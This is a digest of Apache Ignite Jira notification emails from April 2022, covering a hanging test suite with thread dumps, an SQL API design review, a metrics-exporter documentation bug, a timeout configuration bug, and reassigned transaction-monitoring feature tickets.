[jira] [Commented] (IGNITE-16805) Cache Restarts 1 suite hangs

2022-04-13 Thread Pavel Pereslegin (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521527#comment-17521527
 ] 

Pavel Pereslegin commented on IGNITE-16805:
---

[~NSAmelchev],
thanks for the help and review.

> Cache Restarts 1 suite hangs
> 
>
> Key: IGNITE-16805
> URL: https://issues.apache.org/jira/browse/IGNITE-16805
> Project: Ignite
>  Issue Type: Bug
>Reporter: Pavel Pereslegin
>Assignee: Pavel Pereslegin
>Priority: Minor
> Fix For: 2.14
>
>  Time Spent: 40m
>  Remaining Estimate: 0h
>
> h5. Cache Restarts 1 suite hangs on TeamCity due to 
> GridCachePartitionedOptimisticTxNodeRestartTest test.
> https://ci.ignite.apache.org/viewType.html?buildTypeId=IgniteTests24Java8_CacheRestarts1=buildTypeHistoryList_IgniteTests24Java8=%3Cdefault%3E
> {noformat}
>  Thread 
> [name="test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%",
>  id=383240, state=WAITING, blockCnt=20, waitCnt=42]
>  Lock [object=java.lang.Thread@686cf8ad, ownerName=null, ownerId=-1]
>  at java.base@11.0.8/java.lang.Object.wait(Native Method)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1305)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1380)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.checkRestartWithTx(GridCacheAbstractNodeRestartSelfTest.java:850)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.testRestartWithTxTenNodesTwoBackups(GridCacheAbstractNodeRestartSelfTest.java:543)
>  at 
> o.a.i.i.processors.cache.distributed.near.GridCachePartitionedOptimisticTxNodeRestartTest.testRestartWithTxTenNodesTwoBackups(GridCachePartitionedOptimisticTxNodeRestartTest.java:141)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native 
> Method)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>  at 
> java.base@11.0.8/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>  at java.base@11.0.8/java.lang.reflect.Method.invoke(Method.java:566)
>  at 
> org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:50)
>  at 
> org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
> at 
> org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:47)
>  at 
> org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
>  at 
> o.a.i.testframework.junits.GridAbstractTest$6.run(GridAbstractTest.java:2431)
>  at java.base@11.0.8/java.lang.Thread.run(Thread.java:834)
> 
> "test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%" 
> #383240 prio=5 os_prio=0 cpu=649.37ms elapsed=6627.99s tid=0x7f69575ff000 
> nid=0x6474 waiting on condition  [0x7f68edcc2000]
>java.lang.Thread.State: WAITING (parking)
>   at jdk.internal.misc.Unsafe.park(java.base@11.0.8/Native Method)
>   - parking to wait for  <0x87987d88> (a 
> java.util.concurrent.CountDownLatch$Sync)
>   at 
> java.util.concurrent.locks.LockSupport.park(java.base@11.0.8/LockSupport.java:194)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.parkAndCheckInterrupt(java.base@11.0.8/AbstractQueuedSynchronizer.java:885)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1039)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1345)
>   at 
> java.util.concurrent.CountDownLatch.await(java.base@11.0.8/CountDownLatch.java:232)
>   at 
> org.apache.ignite.internal.util.IgniteUtils.awaitQuiet(IgniteUtils.java:8106)
>   at 
> org.apache.ignite.internal.IgnitionEx$IgniteNamedInstance.grid(IgnitionEx.java:1657)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1292)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1270)
>   at org.apache.ignite.Ignition.allGrids(Ignition.java:503)
>   at 
> org.apache.ignite.testframework.junits.GridAbstractTest.stopAllGrids(GridAbstractTest.java:1563)
>   at 
> org.apache.ignite.testframework.junits.GridAbstractTest.stopAllGrids(GridAbstractTest.java:1550)
>   at 
> org.apache.ignite.testframework.junits.GridAbstractTest.stopAllGrids(GridAbstractTest.java:1542)
>   at 
> org.apache.ignite.internal.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.checkRestartWithTx(GridCacheAbstractNodeRestartSelfTest.java:856)
>   at 
> 

[jira] [Commented] (IGNITE-16805) Cache Restarts 1 suite hangs

2022-04-13 Thread Ignite TC Bot (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16805?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521524#comment-17521524
 ] 

Ignite TC Bot commented on IGNITE-16805:


{panel:title=Branch: [pull/9945/head] Base: [master] : No blockers 
found!|borderStyle=dashed|borderColor=#ccc|titleBGColor=#D6F7C1}{panel}
{panel:title=Branch: [pull/9945/head] Base: [master] : No new tests 
found!|borderStyle=dashed|borderColor=#ccc|titleBGColor=#F7D6C1}{panel}
[TeamCity *-- Run :: All* 
Results|https://ci.ignite.apache.org/viewLog.html?buildId=6522281&buildTypeId=IgniteTests24Java8_RunAll]

> Cache Restarts 1 suite hangs
> 
>
> Key: IGNITE-16805
> URL: https://issues.apache.org/jira/browse/IGNITE-16805
> Project: Ignite
>  Issue Type: Bug
>Reporter: Pavel Pereslegin
>Assignee: Pavel Pereslegin
>Priority: Minor
> Fix For: 2.14
>
>  Time Spent: 0.5h
>  Remaining Estimate: 0h
>
> h5. Cache Restarts 1 suite hangs on TeamCity due to 
> GridCachePartitionedOptimisticTxNodeRestartTest test.
> https://ci.ignite.apache.org/viewType.html?buildTypeId=IgniteTests24Java8_CacheRestarts1=buildTypeHistoryList_IgniteTests24Java8=%3Cdefault%3E
> {noformat}
>  Thread 
> [name="test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%",
>  id=383240, state=WAITING, blockCnt=20, waitCnt=42]
>  Lock [object=java.lang.Thread@686cf8ad, ownerName=null, ownerId=-1]
>  at java.base@11.0.8/java.lang.Object.wait(Native Method)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1305)
>  at java.base@11.0.8/java.lang.Thread.join(Thread.java:1380)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.checkRestartWithTx(GridCacheAbstractNodeRestartSelfTest.java:850)
>  at 
> o.a.i.i.processors.cache.distributed.GridCacheAbstractNodeRestartSelfTest.testRestartWithTxTenNodesTwoBackups(GridCacheAbstractNodeRestartSelfTest.java:543)
>  at 
> o.a.i.i.processors.cache.distributed.near.GridCachePartitionedOptimisticTxNodeRestartTest.testRestartWithTxTenNodesTwoBackups(GridCachePartitionedOptimisticTxNodeRestartTest.java:141)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native 
> Method)
>  at 
> java.base@11.0.8/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>  at 
> java.base@11.0.8/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>  at java.base@11.0.8/java.lang.reflect.Method.invoke(Method.java:566)
>  at 
> org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:50)
>  at 
> org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
> at 
> org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:47)
>  at 
> org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
>  at 
> o.a.i.testframework.junits.GridAbstractTest$6.run(GridAbstractTest.java:2431)
>  at java.base@11.0.8/java.lang.Thread.run(Thread.java:834)
> 
> "test-runner-#376077%near.GridCachePartitionedOptimisticTxNodeRestartTest%" 
> #383240 prio=5 os_prio=0 cpu=649.37ms elapsed=6627.99s tid=0x7f69575ff000 
> nid=0x6474 waiting on condition  [0x7f68edcc2000]
>java.lang.Thread.State: WAITING (parking)
>   at jdk.internal.misc.Unsafe.park(java.base@11.0.8/Native Method)
>   - parking to wait for  <0x87987d88> (a 
> java.util.concurrent.CountDownLatch$Sync)
>   at 
> java.util.concurrent.locks.LockSupport.park(java.base@11.0.8/LockSupport.java:194)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.parkAndCheckInterrupt(java.base@11.0.8/AbstractQueuedSynchronizer.java:885)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1039)
>   at 
> java.util.concurrent.locks.AbstractQueuedSynchronizer.acquireSharedInterruptibly(java.base@11.0.8/AbstractQueuedSynchronizer.java:1345)
>   at 
> java.util.concurrent.CountDownLatch.await(java.base@11.0.8/CountDownLatch.java:232)
>   at 
> org.apache.ignite.internal.util.IgniteUtils.awaitQuiet(IgniteUtils.java:8106)
>   at 
> org.apache.ignite.internal.IgnitionEx$IgniteNamedInstance.grid(IgnitionEx.java:1657)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1292)
>   at org.apache.ignite.internal.IgnitionEx.allGrids(IgnitionEx.java:1270)
>   at org.apache.ignite.Ignition.allGrids(Ignition.java:503)
>   at 
> org.apache.ignite.testframework.junits.GridAbstractTest.stopAllGrids(GridAbstractTest.java:1563)
>   at 
> 

[jira] [Commented] (IGNITE-15212) [Ignite 3] SQL API design.

2022-04-13 Thread Andrey N. Gura (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-15212?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521510#comment-17521510
 ] 

Andrey N. Gura commented on IGNITE-15212:
-

[~amashenkov] LGTM. Thanks for your contribution!

> [Ignite 3] SQL API design.
> --
>
> Key: IGNITE-15212
> URL: https://issues.apache.org/jira/browse/IGNITE-15212
> Project: Ignite
>  Issue Type: New Feature
>  Components: sql
>Reporter: Andrey Mashenkov
>Assignee: Andrey Mashenkov
>Priority: Major
>  Labels: ignite-3
>  Time Spent: 7h 40m
>  Remaining Estimate: 0h
>
> We need an SQL API for executing queries, query management, and maybe other 
> stuff like statistics management.
> Let's consider:
> # sync, async and reactive ways of query execution, compared with other 
> vendors' APIs;
> # potential integrations with frameworks like:
> ** Reactor - a rich API for working with reactive streams [1]
> ** R2DBC - a reactive analog of JDBC [2]
> ** JOOQ - a query builder [3]
> and then propose a draft of how the SQL API could look, for a further IEP.
> [1] https://projectreactor.io/
> [2] https://r2dbc.io/
> [3] https://www.jooq.org/



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Commented] (IGNITE-16840) Error creating bean SqlViewMetricExporterSpi while setting bean property 'metricExporterSpi' according documentation

2022-04-13 Thread YuJue Li (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16840?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521498#comment-17521498
 ] 

YuJue Li commented on IGNITE-16840:
---

This issue is caused by outdated documentation. I think the documentation 
should be updated.

> Error creating bean SqlViewMetricExporterSpi while setting bean property 
> 'metricExporterSpi' according documentation
> 
>
> Key: IGNITE-16840
> URL: https://issues.apache.org/jira/browse/IGNITE-16840
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.12
>Reporter: Igor Zadubinin
>Assignee: Igor Zadubinin
>Priority: Major
>
> Error creating bean SqlViewMetricExporterSpi while setting bean property 
> 'metricExporterSpi' according documentation 
> [https://ignite.apache.org/docs/latest/monitoring-metrics/new-metrics-system]
>  
> Error creating bean with name 'ignite.cfg' defined in URL 
> [file:/Users/a19759135/Ignite/distrib/apache-ignite-2.12.0-bin/bin/../config/serverExampleConfig.xml]:
>  Cannot create inner bean 
> 'org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi#2df9b86' of type 
> [org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi] while setting 
> bean property 'metricExporterSpi' with key [0]; nested exception is 
> org.springframework.beans.factory.CannotLoadBeanClassException: Cannot find 
> class [org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi] for bean 
> with name 'org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi#2df9b86' 
> defined in URL 
> [file:/Users/a19759135/Ignite/distrib/apache-ignite-2.12.0-bin/bin/../config/serverExampleConfig.xml];
>  nested exception is java.lang.ClassNotFoundException: 
> org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Commented] (IGNITE-12652) Add example of failure handling

2022-04-13 Thread Luchnikov Alexander (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-12652?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521485#comment-17521485
 ] 

Luchnikov Alexander commented on IGNITE-12652:
--

[~akalashnikov]
Hi, is this [PR|https://github.com/apache/ignite/pull/9961] enough as an 
example?
In what form can an example show the work of the DiagnosticProcessor?

> Add example of failure handling
> ---
>
> Key: IGNITE-12652
> URL: https://issues.apache.org/jira/browse/IGNITE-12652
> Project: Ignite
>  Issue Type: Task
>  Components: examples
>Reporter: Anton Kalashnikov
>Assignee: Luchnikov Alexander
>Priority: Major
>  Labels: newbie
>  Time Spent: 10m
>  Remaining Estimate: 0h
>
> Ignite has the following feature - 
> https://apacheignite.readme.io/docs/critical-failures-handling - but there 
> is no example of how to use it correctly, so it would be good to add some 
> examples.
> Also, Ignite has the DiagnosticProcessor, which is invoked when the failure 
> handler is triggered. It may be a good idea to add to this example some 
> samples of diagnostic work.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-11302) idleConnectionTimeout TcpComm different on server and client (client default > server custom) lead to wait until client timeout on server side

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-11302?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-11302:


Assignee: (was: Dmitriy Sorokin)

> idleConnectionTimeout TcpComm different on server and client (client default 
> > server custom) lead to wait until client timeout on server side
> --
>
> Key: IGNITE-11302
> URL: https://issues.apache.org/jira/browse/IGNITE-11302
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.5
>Reporter: ARomantsov
>Priority: Critical
>
> Server config:
> {code:xml}
> <bean class="org.apache.ignite.spi.communication.tcp.TcpCommunicationSpi">
> <!-- ... -->
> </bean>
> 
> Client config
> 
> <bean class="org.apache.ignite.spi.communication.tcp.TcpCommunicationSpi">
> <!-- ... -->
> </bean>
> {code}
> The server waits for the default idleConnectionTimeout (10 m) before the 
> client failure is detected.
> If both configs set idleConnectionTimeout=1 s, Ignite works according to the 
> config.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-11302) idleConnectionTimeout TcpComm different on server and client (client default > server custom) lead to wait until client timeout on server side

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-11302?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-11302:


Assignee: Dmitriy Sorokin

> idleConnectionTimeout TcpComm different on server and client (client default 
> > server custom) lead to wait until client timeout on server side
> --
>
> Key: IGNITE-11302
> URL: https://issues.apache.org/jira/browse/IGNITE-11302
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.5
>Reporter: ARomantsov
>Assignee: Dmitriy Sorokin
>Priority: Critical
>
> Server config:
> {code:xml}
> <bean class="org.apache.ignite.spi.communication.tcp.TcpCommunicationSpi">
> <!-- ... -->
> </bean>
> 
> Client config
> 
> <bean class="org.apache.ignite.spi.communication.tcp.TcpCommunicationSpi">
> <!-- ... -->
> </bean>
> {code}
> The server waits for the default idleConnectionTimeout (10 m) before the 
> client failure is detected.
> If both configs set idleConnectionTimeout=1 s, Ignite works according to the 
> config.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-6300) BinaryObject's set size estimator

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-6300?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-6300:
---

Assignee: (was: Dmitriy Sorokin)

> BinaryObject's set size estimator
> -
>
> Key: IGNITE-6300
> URL: https://issues.apache.org/jira/browse/IGNITE-6300
> Project: Ignite
>  Issue Type: New Feature
>Reporter: Anton Vinogradov (Obsolete, actual is "av")
>Priority: Major
>
> Need to provide an API to estimate memory requirements for any data model.
> For example:
> 1) You have classes A, B and C with known fields and a known data 
> distribution over these fields.
> 2) You know that you have to keep 1M instances of A, 2M of B and 45K of C.
> 3) BinarySizeEstimator should return the expected memory consumption for the 
> actual Ignite version without starting a node.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-6894) Hanged Tx monitoring

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-6894?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-6894:
---

Assignee: (was: Dmitriy Sorokin)

> Hanged Tx monitoring
> 
>
> Key: IGNITE-6894
> URL: https://issues.apache.org/jira/browse/IGNITE-6894
> Project: Ignite
>  Issue Type: Improvement
>Reporter: Anton Vinogradov (Obsolete, actual is "av")
>Priority: Major
>  Labels: iep-7
>
> Hanging Transactions not Related to Deadlock
> Description
>  This situation can occur if the user explicitly marks up the transaction 
> (especially PESSIMISTIC REPEATABLE_READ) and, for example, calls a remote 
> service (which may be unresponsive) after acquiring some locks. All other 
> transactions depending on the same keys will hang.
> Detection and Solution
>  This most likely cannot be resolved automatically other than rolling back 
> the TX by timeout and releasing all the locks acquired so far. Such TXs can 
> also be rolled back from the Web Console as described above.
>  If a transaction has been rolled back on timeout or via the UI, then any 
> further action in the transaction, e.g. a lock acquisition or commit 
> attempt, should throw an exception.
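>  A minimal sketch of such a timeout-based safeguard (the cache and the 
> timeout value are arbitrary):
> {code:java}
> import org.apache.ignite.Ignite;
> import org.apache.ignite.IgniteCache;
> import org.apache.ignite.transactions.Transaction;
> import org.apache.ignite.transactions.TransactionConcurrency;
> import org.apache.ignite.transactions.TransactionIsolation;
> 
> class TxTimeoutExample {
>     // Sketch: a pessimistic transaction with an explicit timeout, so a hung
>     // transaction is rolled back and its locks are released.
>     void updateWithTimeout(Ignite ignite, IgniteCache<Integer, String> cache) {
>         try (Transaction tx = ignite.transactions().txStart(
>                 TransactionConcurrency.PESSIMISTIC,
>                 TransactionIsolation.REPEATABLE_READ,
>                 10_000, // timeout, ms (arbitrary)
>                 0)) {   // txSize hint; 0 = unknown
>             cache.put(1, "value");
>             tx.commit();
>         }
>     }
> }
> {code}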
> Report
> Management tools (e.g. the Web Console) should provide the ability to roll 
> back any transaction via the UI.
>  Long-running transactions should be reported to the logs. The log record 
> should contain: near nodes, transaction IDs, cache names, keys (limited to 
> several tens), etc. ( ?).
> Also, there should be a screen in the Web Console that lists all ongoing 
> transactions in the cluster, including the info as above.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-6895) TX deadlock monitoring

2022-04-13 Thread Dmitriy Sorokin (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-6895?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Dmitriy Sorokin reassigned IGNITE-6895:
---

Assignee: (was: Dmitriy Sorokin)

> TX deadlock monitoring
> --
>
> Key: IGNITE-6895
> URL: https://issues.apache.org/jira/browse/IGNITE-6895
> Project: Ignite
>  Issue Type: Improvement
>Reporter: Anton Vinogradov (Obsolete, actual is "av")
>Priority: Major
>  Labels: iep-7
>
> Deadlocks with Cache Transactions
> Description
> Deadlocks of this type are possible if the user locks 2 or more keys within 
> 2 or more transactions in different orders (this does not apply to OPTIMISTIC 
> SERIALIZABLE transactions, as they are capable of detecting a deadlock and 
> choosing the winning tx). Currently, Ignite can detect deadlocked 
> transactions, but this procedure is started only for transactions that have 
> a timeout set explicitly, or when the default timeout in the configuration 
> is set to a value greater than 0 (see the sketch below).
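>  A minimal sketch of enabling detection via a default timeout (the value is 
> arbitrary):
> {code:java}
> import org.apache.ignite.configuration.IgniteConfiguration;
> import org.apache.ignite.configuration.TransactionConfiguration;
> 
> class DeadlockDetectionConfig {
>     // Sketch: a non-zero default tx timeout turns on deadlock detection for
>     // transactions that do not set a timeout explicitly.
>     static IgniteConfiguration config() {
>         return new IgniteConfiguration()
>             .setTransactionConfiguration(new TransactionConfiguration()
>                 .setDefaultTxTimeout(10_000));
>     }
> }
> {code}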
> Detection and Solution
> Each NEAR node should periodically (need a new config property?) scan the 
> list of local transactions and initiate the same procedure as we have now 
> for timed-out transactions. If a deadlock is found, it should be reported to 
> the logs. The log record should contain: near nodes, transaction IDs, cache 
> names, and the keys (limited to several tens) involved in the deadlock. The 
> user should be able to configure the default behavior - REPORT_ONLY, 
> ROLLBACK (any more?) - or manually roll back the selected transaction 
> through the Web Console or Visor.
> Report
> If a deadlock is found, it should be reported to the logs. The log record 
> should contain: near nodes, transaction IDs, cache names, and the keys 
> (limited to several tens) involved in the deadlock.
> Also, there should be a screen in the Web Console that lists all ongoing 
> transactions in the cluster, including the following info:
> - Near node
> - Start time
> - DHT nodes
> - Pending Locks (by request)
> The Web Console should provide the ability to roll back any transaction via 
> the UI.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)